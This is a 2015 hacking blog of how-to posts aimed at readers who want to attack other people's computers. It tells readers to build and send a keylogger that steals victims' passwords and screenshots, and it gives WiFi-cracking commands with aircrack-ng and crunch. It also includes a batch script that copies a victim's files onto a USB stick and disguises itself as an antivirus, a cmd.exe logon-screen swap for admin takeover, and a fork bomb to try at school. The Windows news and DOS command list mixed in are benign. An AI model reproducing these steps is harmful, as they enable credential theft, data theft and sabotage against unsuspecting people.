Monday, December 14, 2015

How To Hack Password Facebook,Gmail,MSN any Using Predator

Predator is a Key Logger Which can collects information From the Victom's PC and Send It To the Hackers.

Predator is a Powerful Key-Logger and With Much Interested Options and Commands. You can Build a System exe and Send it to Some one to Hack Accounts. When The user open it ,it automatically executes in system drive and start its work.

You Can Use Ftp Server, Php online Page and Also Your Email Address To Receive Emails With All Information include all types of  Username and Password , Screen Shots ,Clipboard .


















How TO : 


  • First of All Disable Your Antivirus.(antivirus , anti spyware Security Updates)
  • Extract Zip. and Open Predator v13 RUN THIS.exe
  • Select PHP, FTP or Email To Receive Information and enter Your Information here(Screenshot 1)
  • In Settings tab Choose Your Options To Attack Victoms PC(Screenshot 2)
  • Last Tab Build is to Create an executeable App.(Screenshot 3)
  • Now Send This To Your Friends and Tell Them That You Have Hacked Their Accounts And They Would be Impressed. :)
(Note: This Information is Educational Purpose only and Please Not to use to harm anybody) 





Screenshot 1 :



Screenshot 2 :



Screenshot 3 :



How To Cure From Predator :

To Vaccination of a System You need to Just Click on Cure in top Header of Predator 13.



Download Links : Predator 13

How To Hack WiFi Password Using Linux ?

How to hack WiFi password in Linux :

Well you can hack any wifi near you if you are using Linux specially Kali Linux.Many people use dictionary attacks but we are going to discuss a new and much powerful attack known as crunch.

As every one uses passwords of length 8-12 digits and in most cases it is numeric(0-9) or (a-z) or (A-Z).
When every method of hacking wifi fails this method comes in action.As it checks all possible combinations of the words which you type.

Step 1 :open terminal
Step 2 :type ifconfig.
Step 3 :type airmon-ng start wlan0  (zero not o)
Step 4 :now you get mon0 or mon1 at the end of command after performing step2.Note this name as we will use it in next steps
Step 5 :airodump-ng mon0(as i have monitoring mode enabled at mon0)
Step 6 :airodump-ng mon0 --bssid [bssid of network you want to hack] --channel [its CH no] --write yourfilename
when you see a handshake has been developed now its time to crack it.press cntrl+c to stop picking packets.Now try to find password by using crunch command.

crunch 8 12 0123456789 | aircrack-ng --bssid ag:ad:ff:33:22:11 -w- yourfilename.cap

8 means minimum 8 characters
12 means max 12 chars of password
0-9 means only check for numeric pass you can use abc...zABC....Z to check for all possible combinations .
like
crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid ag:ad:ff:33:22:11 -w- yourfilename.cap

Now sit back and wait as this method takes lot of time but it will crack any password of the world.

Microsoft Will Soon Introduce an OS For Mobile named As REDSTONE

An internal build of Windows 10 Mobile's next major update, Redstone, has been spotted on Buildfeed and it could be headed to Windows Insiders in the near future.




It hasn't been long since Microsoft delivered the first major update for Windows 10 and Windows 10 Mobile but the company is already busy developing the OS' next update which is expected to roll out next year. According to Buildfeed, the latest Windows 10 Mobile build from the Redstone branch that is being used internally, is 10.0.11082.1000.rs1_release.151210-2021.

Microsoft is currently planning to push regular monthly updates to Windows 10 in the meantime, and the company has already revealed its "Windows as a service" plans that accompany this. Windows 10 will ship this summer, but Microsoft will continue to update it and components that aren’t core to the operating system on a regular basis. As part of those plans, elements like Project Spartan, Microsoft’s new browser for Windows 10, will be updated through the Windows Store to ensure features can make their way to users at a more rapid pace. Microsoft moved a lot of the core features of Windows Phone to this model last year, and it’s something the company is increasingly doing across Windows as a whole.
The Windows Redstone updates won’t be seen as a Windows 11 or Windows 12, but more of a Windows 10.1, with new features added to the core for all difference device types to take advantage of. Microsoft is currently planning to detail more of its HoloLens and Windows 10 development plans at Build later this month, and it’s possible the company may discuss Windows as a service and Redstone. We understand the Redstone name was first used around two months ago inside Microsoft, so it may still be a little early for the company to share its plans.

How To Turn On God Mode in Windows 7/8/8.1 ?


You wouldn't know it by looking at the Desktop or Start screen, but Windows 8 practically bristles with settings you can customize. The problem is that they're scattered throughout Windows 8, and it can be time-consuming to track them down individually.

However, there is one way to find them all in one place: You can use what some people call "God Mode." While the term "God Mode" has a powerful ring to it, the truth is it's not a separate mode that you put Windows into. It's really a hidden folder that gives you fast access to many settings spread out across Windows 8. It's easy to put that folder right on the Desktop.

Go to Desktop
Create a new Folder and Name it as below
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

It Turns it into a Shell to GodMode.

How To Turn Off Windows 10 Keylogger?Yes It Has a one...

Windows 10 Users You Must Be Know That Windows 10 Include a Key-logger named as Cortana .

Microsoft pretty much admits it has a key-logger in its Windows 10 speech, inking, typing, and privacy FAQ: “When you interact with your Windows device by speaking, writing (handwriting), or typing, Microsoft collects speech, inking, and typing information—including information about your Calendar and People (also known as contacts)…”
Key logger is a Software Which Collects Information About Us,Our Typing , Our Screenshot Our Voice and Send it To Someone Who is Tracking You And Who is The Developer.Its

Due to several privacy issues built into Windows 10, Microsoft has gained a bad reputation

  • Click on the Start Menu, then open Settings.
  • Click on Privacy settings, which you'll find in the very last row of the menu.
  • Once you are in the Privacy menu, click on General
  • Under 'Send Microsoft info about how I write to help use improve typing and writing in the future' – Turn it to Off.
  • Now move ahead to the 'Speech, Inking and Typing' menu and click Stop getting to know me. This will help you turn off the speech tracking through dictation or Cortana.




Out of All Cortana has Great Features Also .Read Here

Friday, December 11, 2015

How To Copy Files From Someones PC Using USB Flash Make A Copying Virus :)

Please Note That This Trick is Educational Purpose only not to harm Someone

This is a Code Just Copy and Paste into Notepad and Save it as Something.bat
(Note: .bat Must be Determined)

@echo off 
:: variables 
/min 
SET odrive=%odrive:~0,2% 
set backupcmd=xcopy /s /c /d /e /h /i /r /y 
echo off 
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics" 
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites" 
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
%backupcmd% "D:\*.jpg" "%drive%\all\notes"
%backupcmd% "e:\*.jpg" "%drive%\all\notes"
%backupcmd% "f:\*.jpg" "%drive%\all\notes"
%backupcmd% "f:\*.txt" "%drive%\all\notes"
%backupcmd% "g:\*.jpg" "%drive%\all\notes"
@echo off 
cls

This Code can Copy All data from Documents>Pictures , Favourites , Videos and All Pictures and Text Docs From victom's D: , E: , F: , G: Drives into a Folder

Make This Code Working Perfect For You :-)
Simply Edit Code as Below

@echo off 
:: variables 
/min 
SET odrive=%odrive:~0,2% 
set backupcmd=xcopy /s /c /d /e /h /i /r /y 
echo off 
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics" 
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites" 
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
%backupcmd% "D:\*.jpg" "%drive%\all\notes"
%backupcmd% "e:\*.jpg" "%drive%\all\notes"
%backupcmd% "f:\*.jpg" "%drive%\all\notes"
%backupcmd% "f:\*.txt" "%drive%\all\notes"
%backupcmd% "g:\*.jpg" "%drive%\all\notes"
@echo off 
cls

See Code Up You Can Change Files types to be Copied
.jpg >> Jpeg Pictures
.png >> Png Pictures
.bmp >> BMP Pictures
.doc >> MS Word Documents
.xls >> Exel Files
.mp3 , .amr etc>>Audio Files
.mp4 , .3gp , .avi , .wmv , .flv >>>> video files
etc

You Can Also Convert bat File into EXE so It Looks Like A Software as an Antivirus using Bat to exe Converter




++++++++++++++++++++++++++++++++++++++++++++
Download Links : Bat To Exe Converter (32bit) / Mirror

                        Bat To Exe Converter (64 bit) / Mirror
++++++++++++++++++++++++++++++++++++++++++++

Hack Admin Account using cmd By Guest Account



First of All open CMD .
(go to Start>all Whprogramtmes>Accessories>Command Prompt)
or (Press Windows key+R and Type "cmd" and enter)

Now type
Cd\
(it changes Working Directory)
and Now Type Each Line Seprately

Cd\windows\system32
Mkdir temphack
Copy logon.scr temphack\logon.scr
Copy cmd.exe temphack\cmd.exe
Del logon.scr
Rename cmd.exe logon.scr 
Exit Net user

Restart Your Pc Now When System Restarted it open CMD as Administrator Account
Now Type

Net user ###### *****

(Here ##### is ADMIN Account name and ***** is a new Hacked Password)


Saturday, December 5, 2015

Create a virus which can Freeze Pc


Make A Virus

Step1 >> Make a Text File via notepad
Step 2 >> Copy This Code.


%0|%0

Step 3>> Paste It Into Notepad.
Step 4  >> Save File As FUN.Bat(.bat is must)
Note :-Save Type Is also selected Txt but You Must Select All Files.
Try this in your school or college or in your friend computer..

NOTE : This information is Educational Purpose only.



Download Created Bat


All MS DOS Commands



Smile All dos command
 AAJ MAI AAP K LIYE DOS KI SAARI COMMAND LAYA HN

ADDUSERS Add or list users to/from a CSV file
ARP Address Resolution Protocol
ASSOC Change file extension associations
ASSOCIAT One step file association
AT Schedule a command to run at a later time
ATTRIB Change file attributes

BOOTCFG Edit Windows boot settings
BROWSTAT Get domain, browser and PDC info

CACLS Change file permissions
CALL Call one batch program from another
CD Change Directory - move to a specific Folder
CHANGE Change Terminal Server Session properties
CHKDSK Check Disk - check and repair disk problems
CHKNTFS Check the NTFS file system
CHOICE Accept keyboard input to a batch file
CIPHER Encrypt or Decrypt files/folders
CleanMgr Automated cleanup of Temp files, recycle bin
CLEARMEM Clear memory leaks
CLIP Copy STDIN to the Windows clipboard.
CLS Clear the screen
CLUSTER Windows Clustering
CMD Start a new CMD shell
COLOR Change colors of the CMD window
COMP Compare the contents of two files or sets of files
COMPACT Compress files or folders on an NTFS partition
COMPRESS Compress individual files on an NTFS partition
CON2PRT Connect or disconnect a Printer
CONVERT Convert a FAT drive to NTFS.
COPY Copy one or more files to another location
CSVDE Import or Export Active Directory data

DATE Display or set the date
Dcomcnfg DCOM Configuration Utility
DEFRAG Defragment hard drive
DEL Delete one or more files
DELPROF Delete NT user profiles
DELTREE Delete a folder and all subfolders
DevCon Device Manager Command Line Utility
DIR Display a list of files and folders
DIRUSE Display disk usage
DISKCOMP Compare the contents of two floppy disks
DISKCOPY Copy the contents of one floppy disk to another
DNSSTAT DNS Statistics
DOSKEY Edit command line, recall commands, and create macros
DSADD Add user (computer, group..) to active directory
DSQUERY List items in active directory
DSMOD Modify user (computer, group..) in active directory

ECHO Display message on screen
ENDLOCAL End localisation of environment changes in a batch file
ERASE Delete one or more files
EXIT Quit the CMD shell
EXPAND Uncompress files
EXTRACT Uncompress CAB files

FC Compare two files
FDISK Disk Format and partition
FIND Search for a text string in a file
FINDSTR Search for strings in files
FOR Conditionally perform a command several times
FORFILES Batch process multiple files
FORMAT Format a disk
FREEDISK Check free disk space (in bytes)
FSUTIL File and Volume utilities
FTP File Transfer Protocol
FTYPE Display or modify file types used in file extension associations

GLOBAL Display membership of global groups
GOTO Direct a batch program to jump to a labelled line

HELP Online Help
HFNETCHK Network Security Hotfix Checker

IF Conditionally perform a command
IFMEMBER Is the current user in an NT Workgroup
IPCONFIG Configure IP

KILL Remove a program from memory

LABEL Edit a disk label
LOCAL Display membership of local groups
LOGEVENT Write text to the NT event viewer.
LOGOFF Log a user off
LOGTIME Log the date and time in a file

MAPISEND Send email from the command line
MEM Display memory usage
MD Create new folders
MODE Configure a system device
MORE Display output, one screen at a time
MOUNTVOL Manage a volume mount point
MOVE Move files from one folder to another
MOVEUSER Move a user from one domain to another
MSG Send a message
MSIEXEC Microsoft Windows Installer
MSINFO Windows NT diagnostics
MSTSC Terminal Server Connection (Remote Desktop Protocol)
MUNGE Find and Replace text within file(s)
MV Copy in-use files

NET Manage network resources
NETDOM Domain Manager
NETSH Configure network protocols
NETSVC Command-line Service Controller
NBTSTAT Display networking statistics (NetBIOS over TCP/IP)
NETSTAT Display networking statistics (TCP/IP)
NOW Display the current Date and Time
NSLOOKUP Name server lookup
NTBACKUP Backup folders to tape
NTRIGHTS Edit user account rights

PATH Display or set a search path for executable files
PATHPING Trace route plus network latency and packet loss
PAUSE Suspend processing of a batch file and display a message
PERMS Show permissions for a user
PERFMON Performance Monitor
PING Test a network connection
POPD Restore the previous value of the current directory saved by PUSHD
PORTQRY Display the status of ports and services
PRINT Print a text file
PRNCNFG Display, configure or rename a printer
PRNMNGR Add, delete, list printers set the default printer
PROMPT Change the command prompt
P***ec Execute process remotely
PsFile Show files opened remotely
PsGetSid Display the SID of a computer or a user
PsInfo List information about a system
PsKill Kill processes by name or process ID
PsList List detailed information about processes
PsLoggedOn Who's logged on (locally or via resource sharing)
PsLogList Event log records
PsPasswd Change account password
PsService View and control services
PsShutdown Shutdown or reboot a computer
PsSuspend Suspend processes
PUSHD Save and then change the current directory

QGREP Search file(s) for lines that match a given pattern.

RASDIAL Manage RAS connections
RASPHONE Manage RAS connections
RECOVER Recover a damaged file from a defective disk.
REG Read, Set or Delete registry keys and values
REGEDIT Import or export registry settings
REGSVR32 Register or unregister a DLL
REGINI Change Registry Permissions
REM Record comments (remarks) in a batch file
REN Rename a file or files.
REPLACE Replace or update one file with another
RD Delete folder(s)
RDISK Create a Recovery Disk
RMTSHARE Share a folder or a printer
ROBOCOPY Robust File and Folder Copy
ROUTE Manipulate network routing tables
RUNAS Execute a program under a different user account
RUNDLL32 Run a DLL command (add/remove print connections)

SC Service Control
SCHTASKS Create or Edit Scheduled Tasks
SCLIST Display NT Services
ScriptIt Control GUI applications
SET Display, set, or remove environment variables
SETLOCAL Begin localisation of environment changes in a batch file
SETX Set environment variables permanently
SHARE List or edit a file share or print share
SHIFT Shift the position of replaceable parameters in a batch file
SHORTCUT Create a windows shortcut (.LNK file)
SHOWGRPS List the NT Workgroups a user has joined
SHOWMBRS List the Users who are members of a Workgroup
SHUTDOWN Shutdown the computer
SLEEP Wait for x seconds
SOON Schedule a command to run in the near future
SORT Sort input
START Start a separate window to run a specified program or command
SU Switch User
SUBINACL Edit file and folder Permissions, Ownership and Domain
SUBST Associate a path with a drive letter
SYSTEMINFO List system configuration

TASKLIST List running applications and services
TIME Display or set the system time
TIMEOUT Delay processing of a batch file
TITLE Set the window title for a CMD.EXE session
TOUCH Change file timestamps
TRACERT Trace route to a remote host
TREE Graphical display of folder structure
TYPE Display the contents of a text file

USRSTAT List domain usernames and last login

VER Display version information
VERIFY Verify that files have been saved
VOL Display a disk label

WHERE Locate and display files in a directory tree
WHOAMI Output the current UserName and domain
WINDIFF Compare the contents of two files or sets of files
WINMSD Windows system diagnostics
WINMSDP Windows system diagnostics II
WMIC WMI Commands

XCACLS Change file permissions
XCOPY Copy files and folders

Visit Site To Learn CMD

Download in txt

HOW TO FIND LOST MOBILE USING IMEI NUMBER



STEP 1:





First of all you need 15 digit IMEI number of that mobile phone which you have lost sadly.
You can find your phone IMEI number on your phone bill as well as box of your phone.

STEP 2:





Now note down that IMEI number and go to your email id because we are going to send an email.

STEP 3:





Now compose a new email by providing following info.

Your name:
Address:
Phone model:
Make:
Last used No.:
E-mail for communication:
Missed date:
IMEI No.:

and send this email to this email id: cop@vsnl.net





Now just wait for reply from cop@vsnl.net. If your phone in use then they will trace it out and inform you shortly.